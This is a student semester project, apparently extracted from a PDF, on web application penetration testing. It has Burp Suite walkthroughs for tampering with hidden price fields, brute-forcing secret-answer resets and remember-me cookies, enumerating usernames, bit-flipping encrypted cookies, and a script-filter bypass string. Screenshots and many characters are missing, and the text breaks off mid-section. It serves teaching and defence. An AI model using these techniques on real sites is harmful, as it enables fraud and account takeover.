You are on page 1of 100


Shawn Seaman
Semester Project
Web Application Penetration Testing

Table of Contents
Why Web Apps

Security Overview
Core Defense

Technologies Needed to be Understood 7

Application Mapping

Client Side Control Attacks



Session Management


Bypassing Access Controls

SQL Injection




OS Command Injection 63
File Path Manipulation 70
Attacking Users with Cross Site Scripting
Cross Site Request Forgery
Conclusion 92



Why Web Apps?

Before the introduction of web applications, attackers had fewer routers of
attacks. Web apps employ a wide variety of different code and utilize many
protocols, and therefore avenues of attack are much increased over traditional web
server exploitation. Before web applications, an attacker need only gain access to
the web server itself, where they could modify files, deface, or use the server to
distribute their own files. Web applications on the other hand interact with a client
browser, which in turn demonstrates that one of the most native purposes of a web
application is to interact with a client. More specifically, a web application accepts
client input, and as a result passes this input to internal databases which can also
be exploited to steal credentials, bank details, etc. Web applications are being
heavily utilized as they are lightweight and allow dynamic content to be served to
the client on the fly. The connection takes place over web browsers, and these
current browsers are robust in their own right, as they are the middlemen that allow
this stateless http connection to occur, as well as handle client side processing to
take flack off of the web server, and provide user friendly input controls that all
users are familiar with. There will most likely come a time when the only
application utilized client side is a browser. Web applications include word
processing like Google Docs, shopping(Amazon), banking(Chase, Citibank), web
search, email(prior to this email was handle on a separate server), and
administrative interfaces for hardware devices. It is obvious how useful web
application are and it is trivial to understand the advantage of paying bills from a
browser over http connections that are tunneled for security(https), versus having
to go to a bank and physically doing it, but this does not come without challenges.
The versatility, scope, and diversity of the multitude of different web apps make it a
major challenge to secure them.

Web Application Security Overview

A layman user may see that a web application they are interacting with is SSL
secured and take solace in the fact that they have a successful SSL handshake and
the sites certificate is trustable. Unfortunately, SSL is only one means of securing
data between client and server. SSL should not be bashed completely because it
has its use in defending against certain eavesdropping attacks, but it does not have
relevance to the types of attacks that can be launched on the client side of a web
application, nor does it stop any type of server side exploitations that can be
performed. For example, if a malicious user were to send malicious commands
through a username field in a login box, having SSL send that information securely
has nothing to do with the fact that those malicious commands could make the
server contact its back end database and fetch real username and password
credentials. The authors of Web Application Hackers Handbook, for example,
performed thousands of penetration tests on SSL secured websites and the amount

of vulnerabilities they were able to exploit disregarded the scope of SSL protection

As seen above, they encountered broken authentication on sites at a rate of

67 percent. Broken authentication can be simplified to describe a site that has a
weak login mechanism. Whether that weak login mechanism means that the login
was able to be bypassed completely, or controls were not setup to stop brute force
attacks, varies from site to site. Broken access controls were seen at an even
higher rate, affecting 78 percent of all web applications tested. Broken access
controls defeat the purpose of even having login mechanisms, as it allows standard
users, or even guest users, to break functionality, by viewing other user data or
performing unauthorized actions on the web application. SQL injection was seen at
a rate of 36 percent, and though lower, is one of the more damaging attacks. SQL
injection allows attackers to submit SQL commands through the interface of a web
application, and where weak web applications do not sanitize this specially crafted
input, the commands are passed to the database of the web application and
executed on behalf of the malicious user. CSS and information leakage was seen at
a rate of 91 percent and 81 percent. CSS attacks allow malicious users to actively
attack other users on the site, enabling them to steal credentials or carry out
commands with the same privilege level as the user, using the user as a proxy.
Information leakage is mostly seen in the form of flawed error handling. An
example of this is when inputting an , or apostrophe after a url parameter(.php?
id=32), the web site throwing an SQL error.( is an SQL character limiter) This
defective error handling tells the attacker that SQL injection may be possible since
the database handled the character limiter. There are too many vulnerabilities that
may arise because of the mere fact that clients must be able to interact with the

application. Developers of applications must make no assumptions about how a
client may interact with the interface. Malicious users can pass database queries
through input fields, they can modify hidden url parameters to change prices in a
shopping cart, they can intercept and modify cookies that contain session ids of
other users(masquerading as them), and much more. This is just a brief overview
and all these attacks will be explained in greater detail. Immature security
awareness is a common problem with web applications. In house developers are
not necessarily IT security experts. Where they are able to produce functioning
code, they may not understand secure code. Even deeper down the rabbit hole,
where they understand secure code, they may not understand the complex
protocols employed by the application they are designing, and the security flaws
that are inherent to those protocols. Many developers employ the use of third party
plugins and simply integrate them with their own code. These third party plugins
are not necessarily vetted correctly, nor do they adhere to any type of security
standard. This means two things and that is all web applications turn out being
unique and bring their own unique set of vulnerabilities. An operator of a word
press site may have updated their word press template to the most recent secure
version, but if they are using an outdated or even current third party plugin (ex:
calendar plugin) that has vulnerabilities; it creates a premise for the attacker to
exploit the entire application. They need only to scan the site for vulnerable
plugins, and map out their attack methodology from there. Many in house and
contracted web app developers use extremely robust development tools that allow
complex programs to be created with relatively simple input from the actual
programmer. This handicaps programmers to an extent, because they have less
control and less understanding of the framework they are employing, and the
possible exploits that lie within it. When adding this to time and budget constraints,
it is easy to understand why so much vulnerable web applications are in production.
With a deadline approaching, it is faster and cheaper to perform a quick surface
penetration test to finger the more blatant exploits in a product. Unfortunately, in
many instances it takes a full code review and much more stringent testing to find
the less obvious exploits. The scope of many companies IT security seem to lie in
defending the perimeter of their networks. This is not a bad thing but with the rise
of web applications and the understanding of web applications being open to
clients, it makes sense that many companies would rethink their security priorities.
Perimeter protection firewalls, and DMZs are great but many backend databases
that communicate with web applications and in turn with the user cannot be
secured with simple perimeter protection. For example, a web app for a bank may
be grouped with other web applications in a certain DMZ, but when the client
submits requests to access certain account details, the web application may query
servers deep into the corporate infrastructure. Standard perimeter protection would
not stop an attacker who was able to leverage a web application to submit malicious
queries to databases beyond the network, nor would it stop a CSS attack where the
attacker was able to hijack a session that allows more privilege. It is very realistic
to paint a scenario where the attacker leverages the application to bypass all

perimeter protection, by breaking authentication of the application, then pivoting to
other machines, mapping out the network further, and escalating privileges on the
internal network. From there they can even break into other web applications that
exist on the infrastructure level and attack employees and superiors. The shift of
focus must be on web application security as that can nullify perimeter security in a
wide array of ways. Worst of all, such power can be harnessed with a simple
browser, and other tools working in conjunction with the browser. A final thought on
web application security is once again the assumptions of developers. Web
developers must make no assumptions that malicious attackers wont decide to use
powerful tools to create thousands of connections, requests, login attempts, or any
amalgamation of database queries to make the web app behave contradictory.
User-agent protection is complicated, or not employed, and many tools allow the
spoofing of user-agent, so they can appear as standard web browsers, such as
Chrome, Firefox, and Internet Explorer.

Core Defense
The three mechanisms of securing the user access of a web application are
authentication, session management, and access controls.
The most common way to manage user access is through authentication.
The username and password is the obvious choice for authentication, but added
security measures are challenge response tokens and client certificates. Other
capabilities are ingrained into authentication mechanisms, such as password reset.
Such capabilities are also open to attack.
The next logical step after authentication is to manage the actual users
session. With a web application handling 100s of http requests from numerous
users, it needs a way to dictate which requests are coming from which respected
user. This is handled by generating sessions to authenticated users. This is done
by submitting a token to a user that contains a session id. The token is contained
inside of a cookie. This works effectively as the tokens are submitted back and forth
in http requests during the session, keeping track of the user, and adding an
effective timeout in response to null user activity if necessary. Unfortunately, this is
a massive avenue of attack. An attacker can ignore attacking authentication if they
can successfully hijack a users session. This effectively enables them to
masquerade as that user, along with that users special privileges. Even worse,
some session tokens are not transmitted in an http request via cookies, but actually
in hidden form fields within the html code of the web app. This is easily intercepted
by a proxy interceptor and can be manipulated by an attacker.

We covered actually authenticating a user, and managing specific users
sessions once they are authenticated but actually enforcing this across every http
request and every possible interaction on every portion of the web application is a
huge challenge. Developers cannot make any assumptions about how a user may
interact with the application, because incorrect access controls can allow an
attacker to bypass the checks of access. Checking that access controls are
consistent and enforced is a huge undertaking, and the failure of this auditing can
be traced back to the fact that developers are under tight budgets and time
constraints, especially when it comes to security review taking a back seat. Access
control may be checked on one portion of the application, but then on a submission
form for example, the app may not enforce access correctly, allowing an attacker to
exploit from that specific web page, where he failed at others. The key here would
be to audit every page, every function, of the web application that a user can
possibly access.
All user input in a web application should be inherently untrusted. Web application
developers should make no assumptions about what type of input a user will submit
to the web application before it is passed to the server. Malicious users will look to
submit malformed data through input fields that may allow them to bypass
authentication, or hijack databases. Make no assumptions that a user will only
submit their username and password into a login field, nor that they will adhere to
the 6 character maximum, alphabetical numbers only type of enforcement. Once
could use blacklisting, reject known bad, techniques here. This is a weak
technique though. It has a very limited scope. For example, if a form accepts the
full name of a person, and needs to accept the in many peoples last names,
black listing the apostrophe character is severely limiting. Attackers can also
encode the malicious characters they are submitting. Where a may be a
blacklisted character, the URL encoded version of it #27 may not be. This
effectively shows that a blacklist would have to be overly robust and also have to
keep up with ever expanding, evolving attacks. Whitelisting, or accept known good,
is very powerful but also comes with a limited scope. The same issue occurs when
you for example, white list alphabetical and numerical characters, but do not add
certain special characters that need to be incorporated into the field because of the
small chance they may be characters leverage in an attack. Data sanitization is key
in defending against malformed user input. Instead of a simply white list or black
list approach, the application can look to remove malicious characters as they go
from client to server. For example, the removal of an while still allowing the
input through, and then through decodin/encoding append the back into the
statement safely at a certain boundary. This is the primary reason boundary checks
are important. It is very hard to secure input at one choke point, and therefore is
makes more practical sense to do it in stages. For example, make sure at a login
form that the username and password was a specific length and correct type of
character, and then at a different boundary server side or just after the login
whitelisting, perform a sanitization of removing any SQL query input by escaping

any problematic character before the query is made. Semantic checks are also
important and cannot be ignored. No amount of input sanitization will stop a
malicious user who has effectively been able to perform transactions as different
user by hijacking a session. (done by manipulation of cookie or hidden form field)
Therefore, validate the correct user is matched to the correct account before
permitting transactions. This sounds like common sense but the scope of web
application security is so large that these things are easily forgot during the
mapping of an application. There is no single solution to stopping bad Input, and
the answer is not always to clean some of it, but instead completely block it. In
other ways, as pointed out previously, blacklists are a terrible component to utilize.
Taking a look at an example of injecting html code into a web app form field shows
the complex nature of securing input. A blacklist may sanitize <script> when
being inputted but what if it is not done recursively. Effectively we have a defeated
filter but performing <scr<script>ipt> instead. A combination of all these
methods is more appropriate, but nothing is intuitive on defeating malformed input,
and it much be approached with great care.
While great care in stopping attacks is covered, how to handle attackers
should carry as much weight. Proper administration alerting should be employed,
and IP account blocking as a response to attacks. IPS/IDS should be deployed in
front of the webserver. Logs should be maintained and activated to respond to
suspicious behavior. Alerts should be relevant to any suspicious notions that do not
just include suspicious attack query strings. Unusual funds transfers for example, or
an unusual amount of IPs generating http requests to the server and/or unusual
activity coming from these large array of IPs. Securing the authentication method
for administrators is crucial. Many times administrator authentication and even the
interfaces admin panel an admin interacts with is not secured. This is because of
assumptions made by developers that only privileged users will ever access these
functions. If an attacker breaks auth on the admin side, they now control the entire
application and users. If the interface for admin is weak, the attacker can leverage
cross site scripting attacks to steal admin cookies for example. Imperative to
secure the admin interface as shown.

Technologies Needed to Be Understood

Http is a connectionless method for the communication between server and
client, but it indeed uses the stateful protocol of TCP carry its messages. The
communication between client and server is initiated with the TCP handshake. The
http request and http response are the two message types between client (request)
and server(response). They both contain http headers. A brief overview of the
different types of headers should be examined. On the request side:
Accept(why type of content the browser can accept),Authorization(submits
credentials to server),cookie(submits the cookie to server that was originally sent by

User-Agent(info on the browser being used), IF-NONE-MATCH(sends an entity tag
that was sent originally by server specific to the requested resource, server can
decide whether to use cached resource or send a dynamically updated newer one)
IF-MODIFIED-SINCE(Sends the time the request was last requested by the browser
and the server will reissue a cached version if nothing has changed)
Host(specifies the hostname that is part of the entire URL being requested.
On the server side we have the following notable headers as well:
Cache-Control will specific caching parameters of the resource. If it is never to be
cached it would issue a no-cache tag in this header field.
ETag- correlates with the entity tag that was sent by the browser. It is originally
generated by the server.
Expires- Specifies how long a client can access a cached resource before it is
ended. Server, importantly describes information about the server in use.
Set-Cookie header sets the specific cookie that will be sent to the browser to
establish a session.
Two types of http requests must be discerned and they are post requests and
get requests. A post request is the most common request, as it performs an action
on the application, whereas get requests are more suitable for retrieving resources
from the URL. Other methods are the HEAD request, which is similar to a get
request, but only returns headers and no message body. A PUT request enables the
uploaded of a resource to a site, which can be leveraged for attack if enabled by the
server. Multiple cookies can be set in the Set-Cookie header for a http response.
The header can also specify different options, such as the path of the cookie,
whether or not it can only be transmitted over https, and when it may expire
effectively expiring a session. Some response codes should be understood before
attacking applications. 200-OK means successful transmission of http request and
the full response has returned. 302 Found would specify a redirect to a different
url that would actually be specified in the Header location in the http response.
304 Not Modified reissues a cached resource, making that decision based on the IfNone-Match and If-Modified-Since headers in the http request. 400 Bad Request
will occur when an invalid URL is submitted, most likely due to some sort of
misspelling. 401 Unauthorized specifies a need to authenticate before accessing
a resource. 403 Forbidden specifies that a resource is not able to be accessed
even with authentication. 404 Not found specifies a resource is not in existence.
405 Method Not Allowed would specify using one of the methods spoken about
above, where it is not supported by the server. Example would be trying to upload a
script to a server where the PUT method is not allowed. The 413 Request Entity
Too Large response can be seen during buffer overflow attacks. 500 Internal

Server Error and 503 Service Unavailable are codes that are self-explanatory
server side issues.

Encoding will be used constantly within the sphere of attacking web

applications. The nature of html and http is that is extremely text based, therefore
is makes sense that heavy encoding has been utilized by both in order to provide
seamless transmission of unusual characters. Attackers can take advantage of the
inherent encoding schemes employed by web apps by decoding suspicious encoded
strings that are obviously protecting data, and even more devastatingly, encode
malformed data to bypass web filters. Concerning URL encoding, the following
character should always be URL encoded when being used to attack applications:
space % ? & = ; + #. Unicode encoding will used the most when trying to bypass
filters. HTML encoding will be utilized the most when looking to exploit apps that
are vulnerable to cross site scripting attacks. If the application returns the html
output for example, in a dialog box, with the html characters escaped, rest assured
the application should be vulnerable. Base-64 and hex encoded strings should both
be looked out for when analyzing the content in an http response message body.
Any of these strings should be decoded because it is likely that the real messages
contained in these encoded strings reveal information the developers do not want
being viewed.

Application Mapping
It is vital to enumerate all the content of a web app before attempting to
exploit it. All functionalities and pages of the web app should be discovered and
walked through. All forms and drop down menus should be explored extensively.
Automatic spidering is a useful method, to display many of the different areas of the
site that should be explored. This can be performed with the Spider in Burp Suite.

Using this tool we can go through the different categories and function of the site.
Interesting URLs with more promising potential content can be spidered further to

dig deeper into the directory. Listing the directory contents alphabetically can allow
looking for specific keywords, for example login.asp. Pages like this should be
further analyzed and prioritized in the scope of attack. Automated spidering used
alone without any user directed spidering falls short though. Auto spidering will
break functionality at many points, considering it may run into issue with apps that
reissue tokens a certain way at every different page load. It may also run into
problems at authentication pages. Even worse, automatic spidering by default will
look to navigate all drop down menus, and insert test strings into every possible
form field it can. While this can be useful, it can cause major alerts to go off on the
intrusion side, and in a worst case scenario, access some admin functionalities and
perform requests that damage the functionality of the app. Lastly, automatic
spidering may miss URLs when building the site map, as well as hidden content.
Automatic spidering should be used in conjuction with user directed spidering.
Burp Suite, which acts as an interceptor proxy, will log
every request and response made to and from the browser and web app. Stepping
through each page manually will allow the user to approach things more
methodically. Users can login through authentication processes, and map the
pages that spawn as a result of elevated privileges. Once they discover relevant
pages by manual mapping, automated attacks can be launched to catch other
resources that are hidden. Examples of hidden content could be
admin.php,users.php,etc. These could be URLs that are not accessible via
spidering. Burp Suite and other tools allow text lists of keywords to be created and
iterated through automatically. A good text list may contain keywords such as
admin, users ,accounting, access, accounts and more. If one could not access this
hidden content with spidering, a brute force of hundreds of requests using these
keywords appended to the proper hostname ( will expose it, and
effectively allow us to complete our site map. Another important tip is to always
check the sites robot.txt file. The robots.txt file will list URLs that the site does not
wish to be indexed by search engines.

In this example we see that for any browser

(User-agent:*), do not allow cowindex.xml. Upon going to that specific URL, it was
found to be a sitemap with dates appended to every resource that was updated the
past year, and specifications for when the resource was added. Attackers may also

leverage public info in attacks. Using Google can come in handy for this. For
instance, searching will return all cached sites that have the
site linked within it. login is another useful example, as that
will return every result of the site that has the term login existing on it. One may
also look to access cached content during the recon phase. Sites like WayBack
Machine will allow an attacker to view a cached history of different versions of the
site. This can be useful because an older snapshot of the site may of not hidden
resources as effectively as newer versions, allowing you to gather more content to
apply to the update version.
An attack should also fingerprint the actual web server.
Depending on which web server the web application lies on, different technologies
will be employed, as well as different vulnerabilities. There are automated and
manual methods involved in gathering information on the web server. The first
option is to actually use a scanner like Nikto, which will reveal much useful
information. It is important to note that scanners generate thousands of signature
requests and false positives can be a problem, so it is common practice to double
check any finds manually.

In the example above, the banner has been successfully grabbed, revealing that a
Microsoft IIS server is being employed. ASP.NET is the platform used on the
Microsoft servers.


The scan shows the HTTP methods allowed by the server. If the PUT method was
enabled that could be of interest, possibly allowing an attacker to upload malicious
scripts. The admin control panel page is also found, which was hidden during the
automatic spidering. (done from brute forcing common parameters)

Nmap scans are also an alternative. This scan reveals once again that it is an IIS
server and also reveals an FTP server is running on port 21. This can also be
leveraged for attacking. Attackers can also look at file extension to identify web
server technologies. If the extension asp is seen that concludes a Microsoft IIS
server is at play. Other notable extensions: .cfm(Cold Fusion), .aspx(MS,.jsp(Java Server Page), and php. Manually discovering the application
technology can be accomplished by taking advantage of apps that throw error
messages. An attacker can request a made up non-existent filename with the
correct extension and get an error message tailored to the missing resource. If for
example, the attacker then requests a resource that does not exist, but they use a
different technologies respective extension, they may get a simple page not found

error message. This allows the attack to deduce which technology is actually being

Client Side Control Attacks

A huge issue with web app security is client side
controls. Whether this is a cookie, html form, java applet, or a url parameter, many
function of a web app can be controlled client side. It should be understood that all
user input or for that matter, client submitted input is untrusted. This makes sense,
considering that if application logic is controlled client side and not server side, the
client can control and manipulate the data. For instance, if the price of an object is
being submitted via a cookie, it would be trivial to intercept this cookie with an
intercepting proxy, and manipulate the cookies data. Even if the data is encoding, a
determined user can throw the strings through a gauntlet of automatic decoders. It
is at that point they would be able to re-encode their own value, and plug it back
into the http header, cookie, or HTML of the page. It is important therefore to
refrain from even allowing client side control over critical items such as price. If a
user can intercept parameters such as amount and item name, so be it, but a
critical item such as prices and even discounts should be locked down server side.
If parameters must be handled by the client, they should be verified by the server
as well. For example, if the application encrypts the price of a phone, further
encryption of an item tag for example, should be appended and then check server
side. If the phone prices were just simply encrypted, the attacker could simply copy
the encrypted cheaper price, and substitute that string for a more expensive device
before submitting the request back to the server. The same way hidden html form
fields are manipulated, client side scripts can easily be manipulated to change the
output that benefits the attacker. It is common to see javascript where elements
are disabled, which disallow a browser from editing the feature. If this is not locked
down it can be abused to be enabled. ASP.NET technology which is employed by
Microsoft servers utilized a feature called, View State. It is essentially a hidden
form field that contains serialized parameters that, like a cookie, are carried across
successive page requests for the users session. Parameters such as item prices or
shopping cart total are popularly carried across in the view state. The data is
usually base64 encoded, which is trivial to defeat with the Burp decoder. If the
developer insists on using the View State feature, it is recommended that they
EnableViewStateMac by setting this parameter to true. Upon enabling this mac,
a keyed hash is appended to the view state data, which hinders actual tampering
within the view state. Regardless of whether one can tamper with the data or not, it

is still important to view the actual data in the viewstate, because such decoded
data could possibly be utilized for submission to other fields across other pages of
the web app. When dealing with java code, such as casino games, where the applet
is controlled client side(which should not be done but has been seen!), an attacker
download the byte code and decompile it with a Java decompiler like Jad. Upon
decompiling the code and access the source code, an attacker could change for
example, a method to get the score, by submitting a static value like, 100,000,
and re-compile the source code back into byte code. Finally, utilizing a way to reupload the new jar with your modified program can allow the attacker to submit
fraudulent scores to the server. It is imperative that developers obfuscate the Java
code to help frustrate attackers who are looking to review and manipulate source
Attacks:(See next Page)

A seemingly normal shopping cart for phones is seen above.(fake)


A hidden form field is located when looking at the source code of the page. So, it is
sent to Burp decoder. It is encoded as ASCII hex and decodes as price=449.

Seen above, we will change the price to 4 dollars instead, and re-encode it as to not
break the application.

Submit the re-encoded value in the proxy interceptor, and submit the request.


After the request is submitted, the price has been manipulated. Scarily, the prices
are able to be changed client side instead of server side.

The above application disables the price via a form field, but submits it via a noneditable form field nonetheless. As bizarre as this seems, it is being covered
because it has been seen before.

Notice in the source code, a disabled=true parameter being submitted in a hidden
form field.

We change this to enabled=true, and submit the


Application is defeated.

Do not use remember me cookies that wrap the
credentials inside of it. Produce the same amount of bits and identical error
messages when user enters the wrong password for a username, or enters a
username that does not exist. This will stop the attacker from being able to
enumerate usernames to brute force at a later time. Do not use secret questions as
an account recovery mechanism that has predictable or low entropy answers. This
is easily dictionary attacked. In using account recovery options, do not reset the
password on the application directly upon a correct secret answer question. A more
in depth approach is too have a successful answer trigger an email to the users
email address. This generated URL should not be predictable, but instead
completely randomized. Further, it should have set time expiration as well. The
following attacks will look to attack bad authentication methods, all which have
been seen in actual practice.


Above, a normal account lockout mechanism, from too many incorrect logins is

The session id cookie will be deleted/changed, and the effect that has on the
application will be noted.

The user is no longer locked out, as lock out is based on a static cookie that
automatically be deleted in automated brute force attacks if needed.


Verification is shown that the login error has changed. It is now taking credentials
What about horrible forgot password mechanisms? Single step mechanisms that
send an email verification should always be used. How can an attacker abuse
secret answer resets to be answered without any type of lockout or uniquely
generated reset URL sent via email?

We want to intercept the request to set a payload to dictionary attack the secret
answer field.


Payload set correctly in Burp Intruder.

A very large file of colors is scraped from the internet to be used as our dictionary
for the automated attack.


Load the list into the payload options section of Burp Intruder.

Analyzing and ordering the different payload requests sent to the site reveal
something interesting. The length of the page returned by magenta differ than all
the wrong answer responses that have a length of 1049 bytes.

Successful reset.

The next attack will attempt to enumerate a real user name of a site, from a fake
one. Many applications load the same error page if you type in a username that
doesnt exist on a site, or type a username that does exist on the site, but use the
wrong password. Many times though, there are subtle differences in the source
code of the page loaded, between a rejected login from a wrong username versus a
correct username but wrong password. We can zero in on real users to attack if we
can get actual correct usernames.


The first shot shows a real user, the second shot shows a nonexistent user. The
login pages look identical but let us take a closer look.

We send the two http responses to Burp Comparer. Strangely, there is a 1 byte
difference in length of the error page.


Looking deeper into Burp Comparer, it highlights the difference in words in the
source code between the two site response. Notice the only difference are the two
usernames, and subtle html following the last line.

We can also look at the difference in bytes in different areas of the response. This
application fails the username obscurity test.

Next, horrible authorization methods, where a remember me function is used to

remember users so they dont have reissue their passwords is used. These
functions should not be used but if they must be, a randomly generated function
should be used instead of anything discernable like a user id. This again, seems
utterley insane but has been seen done in applications.

Logging in as yourself and analyzing the http request is recommended.

A remember user by their user id is being used as seen by being part of the cookie
parameter. This is ripe for a brute force attack.

Above, the payload being highlighted is the user id parameter.


This payload will sequentially rip through all numbered values 1-100.

After the automated attack occurs, all error pages have a byte length of 1897. It
seems the 526 byte length responses are successful logins of user ids.


The applications authorization is deemed broken as proof by the above user account
being compromised.

Session Management
Session management is responsible for sorting, handling, and following the multiple
requests amongst multiple users to the web application. Even the most robust
authentication system is invalidated by vulnerabilities in the session management
implementation. In maintaining state across the stateless http protocol, unique
tokens are generated by the application and granted to users during the time they
log in to the time they log out or expire from the session. This isnt to say that
tokens are not transmitted to clients without logins though. It is very common, for
instance, in shopping applications, to issue a token to a user who hasnt actually
authenticated. In this example, it would be a token transmitted with each response
and request to and from the application, keeping track of the items added to the
shopping cart. The token is dominantly transmitted via the cookie header. This is
via the set-cookie header during the response, and the cookie header in the
request. Set-Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55 is an
example of a cookie field in an http response that is transmitting a token to the
client. Using Burp Suite we will be looking to intercept these tokens, and use the
Burp Sequencer to generate other valid tokens. Two inherent issues with sessions,
that can be exploited with an intercepting proxy are as follows: session generation
and session handling. One should never make any assumptions that a web
application is only using one parameter or item to handle the session. The
application may not use an overt or entire string in a cookie field as a token. It may
be only a portion of it, and it may employ other parameters such as hidden form
fields to handle sessions. A useful tip is to use Burp Repeater, and slowly remove
parts of any items that look like they may be a part of the session. Consecutive
requests in repeater on a session dependent page will reveal what removed items

breaks the session and subsequently show what parameters are effectively the
token. This will help zero in on the next step of focusing on generating other
tokens to hijack accounts. It is important to note that session tokens are not always
used to manage a users state across the application. In stateless session
management, all the data needed to handle state is submitted via the client. This is
similar to the Viewstate. If this is the case, an attacker will likely see much
longer strings in the cookie or hidden form field. The data for state will most likely
be encrypted and/or signed, and requests to one page of the web app will be
denied. For the most part, this type of stateless management, has the server
generates new parts of a token per every request, making it undesirable to try and
attack it. Combined with encryption, is is highly recommended that if this type of
state management is used, than move to code injection and broken access controls
to exploit. The tokens being analyzed here are session tokens with structure. They
may be generated in conjunction with username, date, etc, and then encoded into
base 64 or hex.

Predictable tokens are disastrous. The worst kind of predictable token

would be tokens that issued sequentially. It is trivial for an attacker to use Burp to
issue thousands of requests while simultaneously altering the digits in the token and
then referring to the http response code for successful logins. There are many
times weak token generation when it is primarily based in concealing the sequence.
Weak obfuscation methods are easy to reverse engineer by looking closely at the
string and decoding parts of it, and then looking at patterns in the generated
tokens. Time dependency tokens that rely too much on this are not random enough
and can also be attacked by large automated token generation attacks. An example
of a bad token is one where the 1st part increased sequentially by one for every
token issued, and the second part is completely time based. When a user logs in, it
would show that the first part of the token increased by 2 instead of 1. The second
part would be trivial to automate because the attack would have the time part of
the token before the user, and the one directly after. Another common issue with
the mishandling of securing tokens comes when developers attempt to use weak
encryption modes. CBC and ECB encryption methods both leave cookie contents
able to be manipulated. The problem with ECB occurs because the same block of
encrypted content in a cookie always decrypts to the same block of plaintext. This
is an issue because an attacker would only need to swap around 8 bits in
appropriate places to see if they can manipulate the cookie. For example, if
userid= is one block of data, and the next block is 883;app=, an attacker could
switch the second block with perhaps the sixth block of data that decrypts to
1;time=. This would effectively switch the userid being logged into as userid 1.
Many applications have been found to not check all aspects of a cookie and this
attack has worked. CBC mode differs from the ECB cipher in the fact that the next
block of plaintext that gets decrypted, is XORed against the previous decrypted

plaintext. This causes an attacker who modifies the encrypted text to ineffectively
scramble the next block of data being decrypted. There is a caveat though. Many
applications still only validate the user id of the cookie. An attacker can automate
an attack, using the bit flipper method. This method creates many requests, but
effectively flips character to character in the string. Running the flipper attack long
enough can result in getting account hits with the right user id number.
The above is an example snippet of the bit flipper attack where the last request
actually produces an effective account bypass. In the second to last attempt the
d is uid was flipped to produce an e which is not valid, but the final result is all
that matters.

Having secure generation methods for session tokens is

absolutely necessary, but all in vain if sessions are not handle correctly. If an
attacker is able to intercept a session and replay the captured token, he has no
need to even exploit generation weaknesses. It should be assumed that when
discussing session handling vulnerabilities, that the session token is being
transmitted via the cookie header. Issues in web apps with applying https across
the handling session are overwhelmingly common. Where cookies are transmitted
via http, it is assumed that they are vulnerable to interception. Many websites
employ https only on the login page and after. The issue occurs when they issue a
session cookie to a user before they even authenticate. Even worse, once the user
authenticates and switches to https, the session cookie remains unchanged. A
developer should make sure that the cookie changes after the authenticated
session begins. They should also realize that issues occur when certain pages, like
an about or help page, does not get transmitted via https. A weakness like this
occurs when the user who is already authenticated with their https session,
navigates through the application and hits a page that is not forcing https. The
interceptor now has the already modified authenticated cookie. Developers must
make sure that they enforce ssl on other pages that an authenticated user may
walk through. Better yet, enforcing that the set-cookie flag Is set to secure,
enforces that the cookie will only be transmitted via https. Another issue worth
looking into is whether the web server is running any services on port 80. A
malicious attacker could induce a user to visit a url of the service running on port
80. This is more intrusive of an attack and will be covered later. When securing a
site, this is important to check regardless and a specific check of visiting a site on
the port 80 service will hopefully reveal the cookie was not transmitted.
The main components to remember are secure handling
and secure token generation. Submit tokens over https if the token, change the

token value after authentication, and limit cookie scope. It is extremely important
to set the path flags and domain scope strictly and not liberally. This will aid in
deterring attackers from trying to hijack cookies using cross site request
forgery/cross site scripting attacks. Per page tokens should be used and are used
amongst the most secure applications. This occurs by having a token passed
through a hidden form field or cookie that changes on every request. This will
defeat XSRF. Cookies should never be passed through URL parameters as that
makes session tokens susceptible to being hijacked through logs. Finally,
concurrent sessions should be limited and flagged, a new cookie should be issued
with a new login of the same user, and the original session terminated. Speaking
of termination, a cookie should be set to timeout if the user does not explicitly
logout. If the user does logout, the server needs to terminate that session server
side, not just client side by deleting the set cookie field, but still accepting the
session if replayed by an attacker.

The bit flipping cookie attack will be demonstrated below:

The cookie is viewed, and seems to be using the CBS cipher for encryption.


We select the entire cookie as the payload field.

The bit flipping payload option should be selected.


Hundreds of requests are sent to the web application, each bit being flipped in each

The attack is successful after only 233 requests of flipping the bits every request.


Rendering the page on the bottom pane shows multiple user ids were compromised
by this bit flipping attack. The cookie is insecure and the encryption is being
bypassed. The decryption of the cookie is done server side. So although never
seeing the plaintext, making subtle changes in every request eventually affected
the cookies userid= field. So not only did this badly generated cookie use a weak
encryption scheme, it didnt seem to validate other parameters of the cookie.
When testing a sites cookie generation process for randomness Burp is a useful



Using Burp Sequencer, we can capture thousands of tokens from a site. Burp
Sequencer has built in test methods that will check the amount of randomness in
each bit the cookie. Bit-level analysis of these cookies showed major problems in
multiple bit fields, especially before the 10 th bit. This cookie generation scheme
should be rejected by an application as it fails the randomness test.

Bypassing Access Controls

When proper access controls are not implemented
correctly, even the most beefed up security mechanisms that cover code injection,
cookie management, authentication, etc, become nullified. Bypassing access
controls are seen by the authors of Web Application Hacking Handbook, in a
frequency of 71 percent. What make detecting faulty access controls so difficult? It
lies merely in the fact that for an access control to be detected as faulty, every
possible request, area, and action of a web application must be stepped through.
The first type of broken access models apply to users who are already
authenticated with a system. Vertical breaking involves a situation where a user or
group of users who are do not have certain functionality, bypass the restriction and
access such functionalities. An example of this is quite simple, and could be
illustrated as an ordinary user accessing administrative functions. Perhaps an
employee can only sign off on a certain dollar amount of investment, and a
manager must sign off on a set dollar amount that is higher than the regular

employee. If the regular employee finds a way to process a transaction above their
threshold, they have performed a vertical bypass. Horizontal bypasses can also
occur. These are described as situation where users with the same authority,
accessing the same function, are able to access more resources than they should be
able to. An example of this would be where all users are allowed to check their own
email, but one user has found a horizontal bypass that allows him to check all user
emails. There are also context based access controls. This means that where the
applications state is logically being enforced, the user is also behaving within those
confines. For example, one could say that context based access control have been
broken if a user was able to skip the payment process of a shopping cart, and go
straight to shipping options.
Situations occur where the functionality is completely unprotected. An
example of this is when web applications dynamically build the user interface
through javascript client side code. Take a look at this example of code :
var isAdmin = false;


if (isAdmin)
{ adminMenu.addItem(/menus/secure/ff457/addNewPortalUser2.jsp,
a new user); }(Web Application Hackers Handbook)


Simply studying the language here tells us that the user is not admin, but the URL
to add new users is discoverable. If access controls are broken and unprotected like
in this case, a huge vulnerability occurs. Identifier based functions are also a cause
of concern and need to be tested for broken access controls. For instance,, has the id of a document specific to a
certain user being passed a URL parameter. An attacker would need to know the
DocViewer part of the URL, though this may not be challenging to directory bust
with brutce force methods. Finally, the fact that the parameter id seems to be
numerically generated should be looked into. If some sort of sequential pattern can
be ascertained by the attacker, this creates a problem. Access logs are a haven for
access to these application pages such as viewdocument, createUser, etc, as
well as the specific IDs associated with them. Access logs therefore need to be
